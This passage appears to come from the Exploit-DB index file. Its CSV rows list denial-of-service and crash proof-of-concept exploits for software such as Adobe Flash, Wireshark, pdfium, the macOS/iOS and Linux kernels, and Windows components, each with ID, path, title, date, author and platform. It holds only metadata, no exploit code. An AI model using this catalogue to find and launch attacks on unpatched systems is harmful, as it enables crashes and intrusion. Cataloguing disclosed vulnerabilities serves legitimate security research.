Overflow Crash (PoC)",2016-01-12,"Daniel Velazquez",dos,windows, +39158,exploits/windows/dos/39158.txt,"Advanced Encryption Package Buffer Overflow - Denial of Service",2016-01-03,Vishnu,dos,windows, +39162,exploits/multiple/dos/39162.txt,"pdfium - CPDF_DIBSource::DownSampleScanline32Bit Heap Based Out-of-Bounds Read",2016-01-04,"Google Security Research",dos,multiple, +39163,exploits/multiple/dos/39163.txt,"pdfium - CPDF_TextObject::CalcPositionData Heap Based Out-of-Bounds Read",2016-01-04,"Google Security Research",dos,multiple, +39164,exploits/multiple/dos/39164.txt,"pdfium IsFlagSet (v8 memory management) - SIGSEGV",2016-01-04,"Google Security Research",dos,multiple, +39165,exploits/multiple/dos/39165.txt,"pdfium - CPDF_Function::Call Stack Based Buffer Overflow",2016-01-04,"Google Security Research",dos,multiple, +39169,exploits/multiple/dos/39169.pl,"Ganeti - Multiple Vulnerabilities",2016-01-05,"Pierre Kim",dos,multiple, +39177,exploits/multiple/dos/39177.py,"VideoLAN VLC Media Player 2.1.3 - '.wav' File Memory Corruption",2014-05-09,"Aryan Bayaninejad",dos,multiple, +39180,exploits/windows/dos/39180.pl,"Winamp - '.flv' File Processing Memory Corruption",2014-05-16,"Aryan Bayaninejad",dos,windows, +39181,exploits/windows/dos/39181.py,"Intel Indeo - Video Memory Corruption",2014-05-16,"Aryan Bayaninejad",dos,windows, +39182,exploits/multiple/dos/39182.py,"RealPlayer - '.3gp' File Processing Memory Corruption",2014-05-16,"Aryan Bayaninejad",dos,multiple, +39183,exploits/windows/dos/39183.py,"ALLPlayer - '.wav' File Processing Memory Corruption",2014-05-16,"Aryan Bayaninejad",dos,windows, +39373,exploits/osx/dos/39373.c,"Apple Mac OSX Kernel - no-more-senders Use-After-Free",2016-01-28,"Google Security Research",dos,osx, +39208,exploits/windows/dos/39208.c,"Microsoft Windows - Touch Injection API Local Denial of Service",2014-05-22,"Tavis Ormandy",dos,windows, +39216,exploits/windows/dos/39216.py,"KeePass Password Safe Classic 1.29 - Crash (PoC)",2016-01-11,"Mohammad Reza Espargham",dos,windows, +39219,exploits/multiple/dos/39219.txt,"Adobe Flash BlurFilter Processing - Out-of-Bounds Memset",2016-01-11,"Google Security Research",dos,multiple, +39220,exploits/windows/dos/39220.txt,"Adobe Flash (Multiple Scripts) - Use-After-Free When Rendering Displays (1)",2016-01-11,"Google Security Research",dos,windows, +39221,exploits/win_x86-64/dos/39221.txt,"Adobe Flash - Use-After-Free When Setting Stage",2016-01-11,"Google Security Research",dos,win_x86-64, +39229,exploits/linux/dos/39229.cpp,"Grassroots DICOM (GDCM) 2.6.0 and 2.6.1 - ImageRegionReader::ReadIntoBuffer Buffer Overflow",2016-01-12,"Stelios Tsampas",dos,linux, +39232,exploits/windows/dos/39232.txt,"Microsoft Windows - devenum.dll!DeviceMoniker::Load() Heap Corruption Buffer Underflow (MS16-007)",2016-01-13,"Google Security Research",dos,windows, +39233,exploits/windows/dos/39233.txt,"Microsoft Office / COM Object - 'WMALFXGFXDSP.dll' DLL Planting (MS16-007)",2016-01-13,"Google Security Research",dos,windows, +39242,exploits/windows/dos/39242.py,"NetSchedScan 1.0 - Crash (PoC)",2016-01-15,"Abraham Espinosa",dos,windows, +39371,exploits/osx/dos/39371.c,"Apple Mac OSX - IOBluetoothHCIPacketLogUserClient Memory Corruption",2016-01-28,"Google Security Research",dos,osx, +39372,exploits/osx/dos/39372.c,"Apple Mac OSX - 'IOBluetoothHCIUserClient' Arbitrary Kernel Code Execution",2016-01-28,"Google Security Research",dos,osx, +39274,exploits/windows/dos/39274.py,"CesarFTP 0.99g - XCWD Denial of Service",2016-01-19,"Irving Aguilar",dos,windows,21 +39275,exploits/windows/dos/39275.txt,"PDF-XChange Viewer 2.5.315.0 - Shading Type 7 Heap Memory Corruption",2016-01-19,"Sébastien Morin",dos,windows, +39305,exploits/freebsd/dos/39305.py,"FreeBSD SCTP ICMPv6 - Error Processing",2016-01-25,ptsecurity,dos,freebsd, +39375,exploits/osx/dos/39375.c,"Apple Mac OSX Kernel - IOAccelDisplayPipeUserClient2 Use-After-Free",2016-01-28,"Google Security Research",dos,osx, +39308,exploits/linux/dos/39308.c,"Linux Kernel 3.x/4.x - prima WLAN Driver Heap Overflow",2016-01-25,"Shawn the R0ck",dos,linux, +39315,exploits/hardware/dos/39315.pl,"Aztech Routers - '/cgi-bin/AZ_Retrain.cgi' Denial of Service",2014-09-15,"Federick Joe P Fajardo",dos,hardware, +39321,exploits/multiple/dos/39321.txt,"pdfium - opj_jp2_apply_pclr 'libopenjpeg' Heap Based Out-of-Bounds Read",2016-01-26,"Google Security Research",dos,multiple, +39322,exploits/multiple/dos/39322.txt,"pdfium - opj_j2k_read_mcc 'libopenjpeg' Heap Based Out-of-Bounds Read",2016-01-26,"Google Security Research",dos,multiple, +39323,exploits/multiple/dos/39323.txt,"Wireshark - 'iseries_check_file_type' Stack Based Out-of-Bounds Read",2016-01-26,"Google Security Research",dos,multiple, +39324,exploits/multiple/dos/39324.txt,"Wireshark - dissect_nhdr_extopt Stack Based Buffer Overflow",2016-01-26,"Google Security Research",dos,multiple, +39325,exploits/multiple/dos/39325.txt,"Wireshark - hiqnet_display_data Static Out-of-Bounds Read",2016-01-26,"Google Security Research",dos,multiple, +39326,exploits/multiple/dos/39326.txt,"Wireshark - 'nettrace_3gpp_32_423_file_open' Stack Based Out-of-Bounds Read",2016-01-26,"Google Security Research",dos,multiple, +39327,exploits/multiple/dos/39327.txt,"Wireshark - dissect_ber_constrained_bitstring Heap Based Out-of-Bounds Read",2016-01-26,"Google Security Research",dos,multiple, +39329,exploits/windows/dos/39329.py,"InfraRecorder - '.m3u' File Buffer Overflow",2014-05-25,"Osanda Malith",dos,windows, +39330,exploits/windows/dos/39330.txt,"Foxit Reader 7.2.8.1124 - '.PDF' Parsing Memory Corruption",2016-01-26,"Francis Provencher",dos,windows, +39331,exploits/windows/dos/39331.pl,"TFTPD32 / Tftpd64 - Denial of Service",2014-05-14,j0s3h4x0r,dos,windows, +39353,exploits/windows/dos/39353.txt,"VideoLAN VLC Media Player 2.2.1 - '.mp4' Heap Memory Corruption",2016-01-28,"Francis Provencher",dos,windows, +39357,exploits/osx/dos/39357.txt,"Apple Mac OSX / iOS - Unsandboxable Kernel Code Exection Due to iokit Double Release in IOKit",2016-01-28,"Google Security Research",dos,osx, +39358,exploits/multiple/dos/39358.txt,"Apple Mac OSX / iOS - Multiple Kernel Uninitialized Variable Bugs Leading to Code Execution Vulnerabilities",2016-01-28,"Google Security Research",dos,multiple, +39359,exploits/ios/dos/39359.txt,"iOS Kernel - AppleOscarGyro Use-After-Free",2016-01-28,"Google Security Research",dos,ios, +39360,exploits/ios/dos/39360.txt,"iOS Kernel - AppleOscarAccelerometer Use-After-Free",2016-01-28,"Google Security Research",dos,ios, +39361,exploits/ios/dos/39361.txt,"iOS Kernel - AppleOscarCompass Use-After-Free",2016-01-28,"Google Security Research",dos,ios, +39362,exploits/ios/dos/39362.txt,"iOS Kernel - AppleOscarCMA Use-After-Free",2016-01-28,"Google Security Research",dos,ios, +39363,exploits/ios/dos/39363.txt,"iOS Kernel - IOHIDEventService Use-After-Free",2016-01-28,"Google Security Research",dos,ios, +39364,exploits/ios/dos/39364.txt,"iOS Kernel - IOReportHub Use-After-Free",2016-01-28,"Google Security Research",dos,ios, +39365,exploits/multiple/dos/39365.c,"Apple Mac OSX / iOS Kernel - IOHDIXControllUserClient::clientClose Use-After-Free/Double-Free",2016-01-28,"Google Security Research",dos,multiple, +39366,exploits/multiple/dos/39366.c,"Apple Mac OSX / iOS Kernel - iokit Registry Iterator Manipulation Double-Free",2016-01-28,"Google Security Research",dos,multiple, +39367,exploits/osx/dos/39367.c,"Apple Mac OSX - io_service_close Use-After-Free",2016-01-28,"Google Security Research",dos,osx, +39368,exploits/osx/dos/39368.c,"Apple Mac OSX - 'gst_configure' Kernel Buffer Overflow",2016-01-28,"Google Security Research",dos,osx, +39369,exploits/osx/dos/39369.c,"Apple Mac OSX - 'IntelAccelerator::gstqConfigure' Kernel NULL Dereference",2016-01-28,"Google Security Research",dos,osx, +39370,exploits/osx/dos/39370.c,"Apple Mac OSX Kernel - Hypervisor Driver Use-After-Free",2016-01-28,"Google Security Research",dos,osx, +39376,exploits/osx/dos/39376.c,"Apple Mac OSX - IOSCSIPeripheralDeviceType00 Userclient Type 12 Kernel NULL Dereference",2016-01-28,"Google Security Research",dos,osx, +39377,exploits/multiple/dos/39377.c,"Apple Mac OSX / iOS - Unsandboxable Kernel Use-After-Free in Mach Vouchers",2016-01-28,"Google Security Research",dos,multiple, +39378,exploits/multiple/dos/39378.c,"Apple Mac OSX / iOS - NECP System Control Socket Packet Parsing Kernel Code Execution Integer Overflow",2016-01-28,"Google Security Research",dos,multiple, +39379,exploits/multiple/dos/39379.txt,"Apple Mac OSX / iOS - Double-Delete IOHIDEventQueue::start Code Execution",2016-01-28,"Google Security Research",dos,multiple, +39380,exploits/osx/dos/39380.c,"Apple Mac OSX - OSMetaClassBase::safeMetaCast in IOAccelContext2::connectClient NULL Dereference",2016-01-28,"Google Security Research",dos,osx, +39381,exploits/osx/dos/39381.c,"Apple Mac OSX - 'IOHDIXControllerUserClient::convertClient' Buffer Integer Overflow",2016-01-28,"Google Security Research",dos,osx, +39393,exploits/windows/dos/39393.txt,"Autonics DAQMaster 1.7.3 - DQP Parsing Buffer Overflow Code Execution",2016-02-01,LiquidWorm,dos,windows, +39395,exploits/windows/dos/39395.txt,"WPS Office < 2016 - '.ppt' Heap Memory Corruption",2016-02-01,"Francis Provencher",dos,windows, +39396,exploits/windows/dos/39396.txt,"WPS Office < 2016 - '.doc' OneTableDocumentStream Memory Corruption",2016-02-01,"Francis Provencher",dos,windows, +39397,exploits/windows/dos/39397.txt,"WPS Office < 2016 - '.ppt' drawingContainer Memory Corruption",2016-02-01,"Francis Provencher",dos,windows, +39398,exploits/windows/dos/39398.txt,"WPS Office < 2016 - '.xls' Heap Memory Corruption",2016-02-01,"Francis Provencher",dos,windows, +39400,exploits/windows/dos/39400.pl,"Toshiba Viewer v2 p3console - Local Denial of Service",2016-02-02,JaMbA,dos,windows, +39401,exploits/multiple/dos/39401.txt,"pdfium - opj_t2_read_packet_header 'libopenjpeg' Heap Use-After-Free",2016-02-02,"Google Security Research",dos,multiple, +39403,exploits/windows/dos/39403.py,"Baumer VeriSens Application Suite 2.6.2 - Buffer Overflow",2016-02-03,LiquidWorm,dos,windows, +39406,exploits/linux/dos/39406.py,"yTree 1.94-1.1 - Local Buffer Overflow",2016-02-03,"Juan Sacco",dos,linux, +39424,exploits/android/dos/39424.txt,"Samsung Galaxy S6 - libQjpeg je_free Crash",2016-02-08,"Google Security Research",dos,android, +39425,exploits/android/dos/39425.txt,"Samsung Galaxy S6 - 'android.media.process' 'MdConvertLine' Face Recognition Memory Corruption",2016-02-08,"Google Security Research",dos,android, +39426,exploits/multiple/dos/39426.txt,"Adobe Flash - Processing AVC Causes Stack Corruption",2016-02-08,"Google Security Research",dos,multiple, +39428,exploits/windows/dos/39428.txt,"PotPlayer 1.6.5x - '.mp3' Crash (PoC)",2016-02-09,"Shantanu Khandelwal",dos,windows, +39429,exploits/windows/dos/39429.txt,"Adobe Photoshop CC / Bridge CC - '.png' Parsing Memory Corruption (1)",2016-02-09,"Francis Provencher",dos,windows, +39430,exploits/windows/dos/39430.txt,"Adobe Photoshop CC / Bridge CC - '.png' Parsing Memory Corruption (2)",2016-02-09,"Francis Provencher",dos,windows, +39431,exploits/windows/dos/39431.txt,"Adobe Photoshop CC / Bridge CC - '.iff' Parsing Memory Corruption",2016-02-09,"Francis Provencher",dos,windows, +39444,exploits/windows/dos/39444.txt,"Alternate Pic View 2.150 - '.pgm' Crash (PoC)",2016-02-15,"Shantanu Khandelwal",dos,windows, +39445,exploits/linux/dos/39445.c,"NTPd ntp-4.2.6p5 - 'ctl_putdata()' Buffer Overflow",2016-02-15,"Marcin Kozlowski",dos,linux, +39447,exploits/windows/dos/39447.py,"Network Scanner 4.0.0.0 - Crash (SEH) (PoC)",2016-02-15,INSECT.B,dos,windows, +39452,exploits/windows/dos/39452.txt,"CyberCop Scanner Smbgrind 5.5 - Buffer Overflow",2016-02-16,hyp3rlinx,dos,windows, +39454,exploits/linux/dos/39454.txt,"glibc - 'getaddrinfo' Stack Based Buffer Overflow (PoC)",2016-02-16,"Google Security Research",dos,linux, +39460,exploits/multiple/dos/39460.txt,"Adobe Flash - Out-of-Bounds Image Read",2016-02-17,"Google Security Research",dos,multiple, +39461,exploits/multiple/dos/39461.txt,"Adobe Flash - textfield Constructor Type Confusion",2016-02-17,"Google Security Research",dos,multiple, +39462,exploits/multiple/dos/39462.txt,"Adobe Flash - Sound.loadPCMFromByteArray Dangling Pointer",2016-02-17,"Google Security Research",dos,multiple, +39463,exploits/multiple/dos/39463.txt,"Adobe Flash - LoadVars.decode Use-After-Free",2016-02-17,"Google Security Research",dos,multiple, +39464,exploits/multiple/dos/39464.txt,"Adobe Flash - H264 Parsing Out-of-Bounds Read",2016-02-17,"Google Security Research",dos,multiple, +39465,exploits/multiple/dos/39465.txt,"Adobe Flash - ATF Processing Heap Overflow",2016-02-17,"Google Security Research",dos,multiple, +39466,exploits/multiple/dos/39466.txt,"Adobe Flash - H264 File Stack Corruption",2016-02-17,"Google Security Research",dos,multiple, +39467,exploits/multiple/dos/39467.txt,"Adobe Flash - BitmapData.drawWithQuality Heap Overflow",2016-02-17,"Google Security Research",dos,multiple, +39470,exploits/windows/dos/39470.py,"XM Easy Personal FTP Server 5.8.0 - 'HELP' Remote Denial of Service",2016-02-19,"Pawan Lal",dos,windows, +39471,exploits/windows/dos/39471.txt,"STIMS Buffer 1.1.20 - Buffer Overflow (SEH) (Denial of Service)",2016-02-19,"Shantanu Khandelwal",dos,windows, +39472,exploits/windows/dos/39472.txt,"STIMS Cutter 1.1.3.20 - Buffer Overflow Denial of Service",2016-02-19,"Shantanu Khandelwal",dos,windows, +39475,exploits/windows/dos/39475.py,"QuickHeal 16.00 - 'webssx.sys' Driver Denial of Service",2016-02-19,"Fitzl Csaba",dos,windows, +39476,exploits/multiple/dos/39476.txt,"Adobe Flash - SimpleButton Creation Type Confusion",2016-02-19,"Google Security Research",dos,multiple, +39482,exploits/multiple/dos/39482.txt,"Wireshark - dissect_oml_attrs Static Out-of-Bounds Read",2016-02-22,"Google Security Research",dos,multiple, +39483,exploits/multiple/dos/39483.txt,"Wireshark - add_ff_vht_compressed_beamforming_report Static Out-of-Bounds Read",2016-02-22,"Google Security Research",dos,multiple, +39484,exploits/multiple/dos/39484.txt,"Wireshark - dissect_ber_set Static Out-of-Bounds Read",2016-02-22,"Google Security Research",dos,multiple, +39487,exploits/multiple/dos/39487.py,"libquicktime 1.2.4 - Integer Overflow",2016-02-23,"Marco Romano",dos,multiple, +39490,exploits/multiple/dos/39490.txt,"Wireshark - vwr_read_s2_s3_W_rec Heap Based Buffer Overflow",2016-02-24,"Google Security Research",dos,multiple, +39491,exploits/linux/dos/39491.txt,"libxml2 - xmlDictAddString Heap Based Buffer Overread",2016-02-24,"Google Security Research",dos,linux, +39492,exploits/linux/dos/39492.txt,"libxml2 - xmlParseEndTag2 Heap Based Buffer Overread",2016-02-24,"Google Security Research",dos,linux, +39493,exploits/linux/dos/39493.txt,"libxml2 - xmlParserPrintFileContextInternal Heap Based Buffer Overread",2016-02-24,"Google Security Research",dos,linux, +39494,exploits/linux/dos/39494.txt,"libxml2 - htmlCurrentChar Heap Based Buffer Overread",2016-02-24,"Google Security Research",dos,linux, +39502,exploits/linux/dos/39502.py,"GpicView 0.2.5 - Crash (PoC)",2016-02-26,"David Silveiro",dos,linux, +39503,exploits/multiple/dos/39503.txt,"Wireshark - print_hex_data_buffer / print_packet Use-After-Free",2016-02-26,"Google Security Research",dos,multiple, +39504,exploits/android/dos/39504.c,"Qualcomm Adreno GPU MSM Driver - perfcounter Query Heap Overflow",2016-02-26,"Google Security Research",dos,android, +39505,exploits/linux/dos/39505.c,"Linux io_submit L2TP sendmsg - Integer Overflow",2016-02-26,"Google Security Research",dos,linux, +39509,exploits/windows/dos/39509.txt,"Crouzet em4 soft 1.1.04 - '.pm4' Integer Division By Zero",2016-03-01,LiquidWorm,dos,windows, +39512,exploits/windows/dos/39512.txt,"Viscomsoft Calendar Active-X 2.0 - Multiple Crashes (PoC)",2016-03-01,"Shantanu Khandelwal",dos,windows, +39516,exploits/windows/dos/39516.py,"Quick Tftp Server Pro 2.3 - Read Mode Denial of Service",2016-03-02,"Guillaume Kaddouch",dos,windows,69 +39517,exploits/windows/dos/39517.py,"FreeProxy Internet Suite 4.10 - Denial of Service",2016-03-02,"Guillaume Kaddouch",dos,windows,8080 +39518,exploits/windows/dos/39518.txt,"PictureTrails Photo Editor GE.exe 2.0.0 - '.bmp' Crash (PoC)",2016-03-02,redknight99,dos,windows, +39529,exploits/multiple/dos/39529.txt,"Wireshark - wtap_optionblock_free Use-After-Free",2016-03-07,"Google Security Research",dos,multiple, +39530,exploits/windows/dos/39530.txt,"Avast! - Authenticode Parsing Memory Corruption",2016-03-07,"Google Security Research",dos,windows, +39533,exploits/windows/dos/39533.txt,"Adobe Digital Editions 4.5.0 - '.pdf' Critical Memory Corruption",2016-03-09,"Pier-Luc Maltais",dos,windows, +39537,exploits/linux/dos/39537.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'digi_acceleport' Nullpointer Dereference",2016-03-09,"OpenSource Security",dos,linux, +39538,exploits/linux/dos/39538.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'Wacom' Multiple Nullpointer Dereferences",2016-03-09,"OpenSource Security",dos,linux, +39539,exploits/linux/dos/39539.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - visor 'treo_attach' Nullpointer Dereference",2016-03-09,"OpenSource Security",dos,linux, +39540,exploits/linux/dos/39540.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - visor clie_5_attach Nullpointer Dereference",2016-03-09,"OpenSource Security",dos,linux, +39542,exploits/linux/dos/39542.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'cypress_m8' Nullpointer Dereference",2016-03-09,"OpenSource Security",dos,linux, +39541,exploits/linux/dos/39541.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'mct_u232' Nullpointer Dereference",2016-03-09,"OpenSource Security",dos,linux, +39543,exploits/linux/dos/39543.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'cdc_acm' Nullpointer Dereference",2016-03-09,"OpenSource Security",dos,linux, +39544,exploits/linux/dos/39544.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'aiptek' Nullpointer Dereference",2016-03-09,"OpenSource Security",dos,linux, +39545,exploits/linux/dos/39545.txt,"Linux Kernel 3.10/3.18 /4.4 - Netfilter IPT_SO_SET_REPLACE Memory Corruption",2016-03-09,"Google Security Research",dos,linux, +39546,exploits/windows/dos/39546.txt,"Nitro Pro 10.5.7.32 / Nitro Reader 5.5.3.1 - Heap Memory Corruption",2016-03-10,"Francis Provencher",dos,windows, +39550,exploits/multiple/dos/39550.py,"libotr 4.1.0 - Memory Corruption",2016-03-10,"X41 D-Sec GmbH",dos,multiple, +39551,exploits/multiple/dos/39551.txt,"Putty pscp 0.66 - Stack Buffer Overwrite",2016-03-10,tintinweb,dos,multiple, +39555,exploits/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'snd-usb-audio' Crash (PoC)",2016-03-14,"OpenSource Security",dos,linux, +39556,exploits/linux/dos/39556.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'iowarrior' Driver Crash (PoC)",2016-03-14,"OpenSource Security",dos,linux, +39557,exploits/windows/dos/39557.py,"Zortam Mp3 Media Studio 20.15 - Overflow (SEH) (Denial of Service)",2016-03-14,INSECT.B,dos,windows, +39560,exploits/windows/dos/39560.txt,"Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",dos,windows, +39561,exploits/windows/dos/39561.txt,"Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",dos,windows, +39562,exploits/windows/dos/39562.html,"Microsoft Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",dos,windows, +39565,exploits/windows/dos/39565.txt,"Netwrix Auditor 7.1.322.0 - ActiveX 'sourceFile' Stack Buffer Overflow",2016-03-16,LiquidWorm,dos,windows, +39570,exploits/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 (x64) - 'amd64_set_ldt' Heap Overflow",2016-03-16,"Core Security",dos,freebsd_x86-64, +39600,exploits/windows/dos/39600.txt,"Avira - Heap Underflow Parsing PE Section Headers",2016-03-23,"Google Security Research",dos,windows, +39601,exploits/windows/dos/39601.txt,"Comodo - PackMan Unpacker Insufficient Parameter Validation",2016-03-23,"Google Security Research",dos,windows, +39602,exploits/windows/dos/39602.txt,"Comodo - LZMA Decoder Heap Overflow via Insufficient Parameter Checks",2016-03-23,"Google Security Research",dos,windows, +39603,exploits/windows/dos/39603.txt,"Comodo - Integer Overlow Leading to Heap Overflow Parsing Composite Documents",2016-03-23,"Google Security Research",dos,windows, +39604,exploits/multiple/dos/39604.txt,"Wireshark - dissect_ber_integer Static Out-of-Bounds Write",2016-03-23,"Google Security Research",dos,multiple, +39605,exploits/windows/dos/39605.txt,"Comodo - Integer Overflow Leading to Heap Overflow in Win32 Emulation",2016-03-23,"Google Security Research",dos,windows, +39606,exploits/windows/dos/39606.txt,"Comodo AntiVirus - Heap Overflow in LZX Decompression",2016-03-23,"Google Security Research",dos,windows, +39607,exploits/osx/dos/39607.c,"Apple Mac OSX Kernel - Code Execution Due to Lack of Bounds Checking in AppleUSBPipe::Abort",2016-03-23,"Google Security Research",dos,osx, +39608,exploits/windows/dos/39608.txt,"Adobe Flash - Shape Rendering Crash",2016-03-23,"Google Security Research",dos,windows, +39609,exploits/windows/dos/39609.txt,"Adobe Flash - Zlib Codec Heap Overflow",2016-03-23,"Google Security Research",dos,windows, +39610,exploits/windows/dos/39610.txt,"Adobe Flash - Sprite Creation Use-After-Free",2016-03-23,"Google Security Research",dos,windows, +39611,exploits/windows/dos/39611.txt,"Adobe Flash - Uninitialized Stack Parameter Access in AsBroadcaster.broadcastMessage UaF Fix",2016-03-23,"Google Security Research",dos,windows, +39612,exploits/windows/dos/39612.txt,"Adobe Flash - Uninitialized Stack Parameter Access in Object.unwatch UaF Fix",2016-03-23,"Google Security Research",dos,windows, +39613,exploits/windows/dos/39613.txt,"Adobe Flash - Uninitialized Stack Parameter Access in MovieClip.swapDepths UaF Fix",2016-03-23,"Google Security Research",dos,windows, +39614,exploits/osx/dos/39614.c,"Apple Mac OSX Kernel - AppleKeyStore Use-After-Free",2016-03-23,"Google Security Research",dos,osx, +39615,exploits/osx/dos/39615.c,"Apple Mac OSX Kernel - Unchecked Array Index Used to Read Object Pointer Then Call Virtual Method in Nvidia Geforce Driver",2016-03-23,"Google Security Research",dos,osx, +39616,exploits/osx/dos/39616.c,"Apple Mac OSX Kernel - Use-After-Free and Double Delete Due to Incorrect Locking in Intel GPU Driver",2016-03-23,"Google Security Research",dos,osx, +39627,exploits/windows/dos/39627.py,"TallSoft SNMP/TFTP Server 1.0.0 - Denial of Service",2016-03-28,"Charley Celice",dos,windows,69 +39629,exploits/android/dos/39629.txt,"Android One - mt_wifi IOCTL_GET_STRUCT Privilege Escalation",2016-03-28,"Google Security Research",dos,android, +39633,exploits/multiple/dos/39633.txt,"Apple QuickTime < 7.7.79.80.95 - '.FPX' Parsing Memory Corruption (1)",2016-03-30,"Francis Provencher",dos,multiple, +39634,exploits/multiple/dos/39634.txt,"Apple QuickTime < 7.7.79.80.95 - '.FPX' Parsing Memory Corruption (2)",2016-03-30,"Francis Provencher",dos,multiple, +39635,exploits/multiple/dos/39635.txt,"Apple QuickTime < 7.7.79.80.95 - '.PSD' Parsing Memory Corruption",2016-03-30,"Francis Provencher",dos,multiple, +39638,exploits/linux/dos/39638.txt,"Kamailio 4.3.4 - Heap Based Buffer Overflow",2016-03-30,"Stelios Tsampas",dos,linux, +39644,exploits/multiple/dos/39644.txt,"Wireshark - dissect_pktc_rekey Heap Based Out-of-Bounds Read",2016-03-31,"Google Security Research",dos,multiple, +39647,exploits/windows/dos/39647.txt,"Microsoft Windows Kernel - Bitmap Use-After-Free",2016-04-01,"Nils Sommer",dos,windows, +39648,exploits/windows/dos/39648.txt,"Microsoft Windows Kernel - 'NtGdiGetTextExtentExW'' Out-of-Bounds Memory Read",2016-04-01,"Nils Sommer",dos,windows, +39649,exploits/multiple/dos/39649.txt,"Adobe Flash - URLStream.readObject Use-After-Free",2016-04-01,"Google Security Research",dos,multiple, +39650,exploits/multiple/dos/39650.txt,"Adobe Flash - textfield.maxChars Use-After-Free",2016-04-01,"Google Security Research",dos,multiple, +39651,exploits/android/dos/39651.txt,"Google Android - 'ih264d_process_intra_mb' Memory Corruption",2016-04-01,"Google Security Research",dos,android, +39652,exploits/multiple/dos/39652.txt,"Adobe Flash - Color.setTransform Use-After-Free",2016-04-01,"Google Security Research",dos,multiple, +39653,exploits/php/dos/39653.txt,"PHP 5.5.33 - Invalid Memory Write",2016-04-01,vah_13,dos,php, +39654,exploits/windows/dos/39654.pl,"Xion Audio Player 1.5 (build 160) - '.mp3' Crash (PoC)",2016-04-04,"Charley Celice",dos,windows, +39657,exploits/multiple/dos/39657.py,"Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow",2016-04-04,PizzaHatHacker,dos,multiple, +39663,exploits/windows/dos/39663.html,"Microsoft Internet Explorer - MSHTML!CSVGHelpers::SetAttributeStringAndPointer Use-After-Free (MS16-023)",2016-04-05,"Google Security Research",dos,windows, +39669,exploits/lin_x86/dos/39669.txt,"Linux (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited",2016-04-06,"Hector Marco & Ismael Ripoll",dos,lin_x86, +39685,exploits/android/dos/39685.txt,"Google Android - IOMX 'getConfig'/'getParameter' Information Disclosure",2016-04-11,"Google Security Research",dos,android, +39686,exploits/android/dos/39686.txt,"Google Android - IMemory Native Interface is Insecure for IPC Use",2016-04-11,"Google Security Research",dos,android, +39699,exploits/windows/dos/39699.html,"Microsoft Internet Explorer 11 - MSHTML!CMarkupPointer::UnEmbed Use-After-Free",2016-04-15,"Marcin Ressel",dos,windows, +39706,exploits/hardware/dos/39706.txt,"TH692 Outdoor P2P HD Waterproof IP Camera - Hard-Coded Credentials",2016-04-18,DLY,dos,hardware, +39712,exploits/win_x86-64/dos/39712.txt,"Microsoft Windows Kernel - DrawMenuBarTemp Wild-Write (MS16-039)",2016-04-20,"Nils Sommer",dos,win_x86-64, +39713,exploits/windows/dos/39713.c,"Hyper-V - 'vmswitch.sys' VmsMpCommonPvtHandleMulticastOids Guest to Host Kernel-Pool Overflow",2016-04-20,"Google Security Research",dos,windows, +39733,exploits/linux/dos/39733.py,"Rough Auditing Tool for Security (RATS) 2.3 - Crash (PoC)",2016-04-25,"David Silveiro",dos,linux, +39740,exploits/windows/dos/39740.cpp,"Microsoft Windows - CSRSS BaseSrvCheckVDM Session 0 Process Creation Privilege Escalation (MS16-048)",2016-04-27,"Google Security Research",dos,windows, +39743,exploits/windows/dos/39743.txt,"Microsoft Windows Kernel - 'win32k.sys' TTF Processing EBLC / EBSC Tables Pool Corruption (MS16-039)",2016-04-28,"Google Security Research",dos,windows, +39747,exploits/linux/dos/39747.py,"Rough Auditing Tool for Security (RATS) 2.3 - Array Out of Block Crash",2016-04-29,"David Silveiro",dos,linux, +39748,exploits/multiple/dos/39748.txt,"Wireshark - dissect_2008_16_security_4 Stack Based Buffer Overflow",2016-04-29,"Google Security Research",dos,multiple, +39749,exploits/multiple/dos/39749.txt,"Wireshark - alloc_address_wmem Assertion Failure",2016-04-29,"Google Security Research",dos,multiple, +39750,exploits/multiple/dos/39750.txt,"Wireshark - ett_zbee_zcl_pwr_prof_enphases Static Out-of-Bounds Read",2016-04-29,"Google Security Research",dos,multiple, +39767,exploits/multiple/dos/39767.txt,"ImageMagick 6.9.3-9/7.0.1-0 - Multiple Vulnerabilities (ImageTragick)",2016-05-04,"Nikolay Ermishkin",dos,multiple, +39768,exploits/multiple/dos/39768.txt,"OpenSSL - Padding Oracle in AES-NI CBC MAC Check",2016-05-04,"Juraj Somorovsky",dos,multiple, +39770,exploits/windows/dos/39770.txt,"McAfee LiveSafe 14.0 - Relocations Processing Memory Corruption",2016-05-04,"Google Security Research",dos,windows, +39773,exploits/linux/dos/39773.txt,"Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps",2016-05-04,"Google Security Research",dos,linux, +39774,exploits/windows/dos/39774.html,"Baidu Spark Browser 43.23.1000.476 - Address Bar URL Spoofing",2016-05-05,"liu zhu",dos,windows, +39775,exploits/windows/dos/39775.py,"RPCScan 2.03 - Hostname/IP Field Crash (PoC)",2016-05-06,"Irving Aguilar",dos,windows, +39776,exploits/windows/dos/39776.py,"CIScan 1.00 - Hostname/IP Field Crash (PoC)",2016-05-06,"Irving Aguilar",dos,windows, +39778,exploits/windows/dos/39778.txt,"Adobe Flash (Multiple Scripts) - Use-After-Free When Rendering Displays (2)",2016-05-06,"Google Security Research",dos,windows, +39779,exploits/windows/dos/39779.txt,"Adobe Flash - MovieClip.duplicateMovieClip Use-After-Free",2016-05-06,"Google Security Research",dos,windows, +39782,exploits/windows/dos/39782.py,"i.FTP 